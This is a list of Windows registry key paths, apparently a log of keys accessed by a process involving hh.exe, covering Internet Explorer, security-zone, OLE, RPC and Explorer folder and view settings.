                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Expand Alt Text

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Images

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Videos

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Display Inline Videos

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Background_Sounds

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Print_Background

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Print_Background

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SmoothScroll

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SmoothScroll

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XMLHTTP

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show image placeholders

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Show image placeholders

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Script Debugger

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableScriptDebuggerIE

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Diagnostics Mode

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Disable Diagnostics Mode

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Move System Caret

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable AutoImageResize

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Enable AutoImageResize

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseHR

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Q300829

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Cleanup HTCs

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XDomainRequest

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\XDomainRequest

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DOMStorage

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DOMStorage

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\JScriptProfileCacheEventDelay

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Default_CodePage

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AutoDetect

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\Default_IEFontSizePrivate

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Visited

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Hover

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Colors

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Size

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Face

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Disable Visited Hyperlinks

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Use Anchor Hover Color

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\MiscFlags

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Allow Programmatic Cut_Copy_Paste

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages

                    
                        HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup\Print_Background

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\(Default)

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Flags

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\(Default)

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Flags

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_96DPI_PIXEL\hh.exe

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_96DPI_PIXEL\*

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSize

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSizePrivate

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESerifFontName

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESansSerifFontName

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEUIFontName

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\hh.exe

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\*

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\VML

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\IE

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\WindowsEdition

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\hh.exe

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\*

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2700

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2700

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/xml\CLSID

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\hh.exe

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\*

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SecuritySafe

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ProtectedModeOffForAllZones

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\MinLevel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\RecommendedLevel

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\MinLevel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\RecommendedLevel

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\MinLevel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\RecommendedLevel

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\MinLevel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\RecommendedLevel

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\MinLevel

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\RecommendedLevel

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME\hh.exe

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME\*

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2106

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2106

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\OperationalData

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnIntranet

                    
                        HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnIntranet

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnIntranet

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Url History\DaysToKeep

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1201

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1201

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c4-5f87-11ed-b63d-806e6f6e6963}\Data

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c4-5f87-11ed-b63d-806e6f6e6963}\Generation

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c5-5f87-11ed-b63d-806e6f6e6963}\Data

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c5-5f87-11ed-b63d-806e6f6e6963}\Generation

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ClientCacheSize

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DriverCompat\Size

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DriverCompat\Name

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2000

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2000

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Feed Discovery\Sound

                    
                        HKEY_CURRENT_USER\Software\Microsoft\FTP\Use Web Based FTP

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PrefetchPrerender\Enabled

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCache

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Category

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Name

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParentFolder

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Description

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\RelativePath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParsingName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InfoTip

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalizedName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Icon

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Security

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResource

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResourceType

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalRedirectOnly

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Roamable

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PreCreate

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Stream

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PublishExpandedPath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Attributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\FolderTypeID

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InitFolderHandler

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Start Menu

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay

                    
                        HKEY_CURRENT_USER\Software\Classes\Directory\DocObject

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject

                    
                        HKEY_CURRENT_USER\Software\Classes\Directory\BrowseInPlace

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace

                    
                        HKEY_CURRENT_USER\Software\Classes\Directory\IsShortcut

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut

                    
                        HKEY_CURRENT_USER\Software\Classes\Directory\AlwaysShowExt

                    
                        HKEY_CURRENT_USER\Software\Classes\Directory\NeverShowExt

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler

                    
